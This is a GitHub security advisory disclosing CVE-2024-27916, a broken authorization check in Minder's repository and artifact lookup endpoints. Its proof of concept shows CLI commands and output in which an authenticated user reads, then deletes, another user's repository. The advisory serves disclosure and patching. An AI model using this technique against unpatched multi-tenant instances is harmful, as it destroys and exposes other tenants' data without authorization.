Skip to content

`GetRepositoryByName`, `DeleteRepositoryByName` and `GetArtifactByName` allow access of arbitrary repositories in Minder by any authenticated user

High
JAORMX published GHSA-v627-69v2-xx37 Mar 4, 2024

Package

minder

Affected versions

<0.20240304.1469_ref.45750b4

Patched versions

0.20240304.1469_ref.45750b4

Description

Summary

A Minder user can use the endpoints listed in the issue title to access any repository in the DB, irrespective of who owns the repo and any permissions that user may have.

Details

https://github.com/stacklok/minder/blob/e88e4b286e4bc04c03b0332a77961f085e1aa77f/database/query/repositories.sql#L22-L23
https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278

The DB query used here checks by repo owner, repo name and provider name (which is always "github"). These query values are not distinct for the particular user - as long as the user has valid credentials and a provider, they can set the repo owner/name to any value they want and the server will return information on this repo.

DeleteRepositoryByName uses the same query and I have been able to delete another user's repo using this technique.

The GetArtifactByName endpoint also uses this DB query. I have not reproduced the behaviour with this endpoint due to a lack of a suitable test case, but I do not see anything in the implementation of the endpoint to prevent it being exploited.

PoC

Setup:

  1. Fresh provider/project on the production minder instance which is owned by me.
  2. A repo registered by another user (in this case, Ozz)
# show my identity
$ minder auth whoami
No config file present, using default values.

 Here are your details:

+----------------------------------------------------+----------------------------------------------------+
|                        KEY                         |                       VALUE                        |
+----------------------------------------------------+----------------------------------------------------+
| Subject                                            | c93cc12e-999d-49f4-9ee3-593fdfb39204               |
+----------------------------------------------------+----------------------------------------------------+
| Created At                                         | 2024-02-26 15:53:29.228 +0000                      |
|                                                    | UTC                                                |
+----------------------------------------------------+----------------------------------------------------+
| Updated At                                         | 2024-02-26 15:53:29.228 +0000                      |
|                                                    | UTC                                                |
+----------------------------------------------------+----------------------------------------------------+
| Minder Server                                      | api.stacklok.com:443                               |
+----------------------------------------------------+----------------------------------------------------+
| Project                                            | dmjb /                                             |
|                                                    | ca059552-7b8a-4c6e-918d-ca7e6cbd0bab               |
+----------------------------------------------------+----------------------------------------------------+

# show that I have no repos registered
$ minder repo list
No config file present, using default values.
+----+---------+----------+-------------+-------+------+
| ID | PROJECT | PROVIDER | UPSTREAM ID | OWNER | NAME |
+----+---------+----------+-------------+-------+------+

# show details on one of Ozz's repos
$ minder repo get -n JAORMX/auditevent
No config file present, using default values.
{
  "id":  "a7e82080-9b6c-41f3-bc08-8e9442f8b2d2",
  "context":  {
    "provider":  "github",
    "project":  "b513f7f0-26dc-42e6-81a0-577df5489e62"
  },
  "owner":  "JAORMX",
  "name":  "auditevent",
  "repoId":  "605597568",
  "hookUrl":  "https://api.github.com/repos/JAORMX/auditevent/hooks/464564107",
  "deployUrl":  "https://api.github.com/repos/JAORMX/auditevent/deployments",
  "cloneUrl":  "https://github.com/JAORMX/auditevent.git",
  "isFork":  true,
  "createdAt":  "2024-03-04T13:27:54.019356Z",
  "updatedAt":  "2024-03-04T13:27:54.019356Z",
  "defaultBranch":  "main"
}

# delete Ozz's repo
$ minder repo delete -n JAORMX/auditevent
No config file present, using default values.
Successfully deleted repo with name: JAORMX/auditevent

# Ozz's repo no longer exists
$ minder repo get -n JAORMX/auditevent
No config file present, using default values.
Message: Error getting repo by name
Details: NotFound means some requested entity (e.g., file or directory) was
not found.

Impact

Any user and project in a multi-tenant Minder instance.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

CVE ID

CVE-2024-27916

Weaknesses

Credits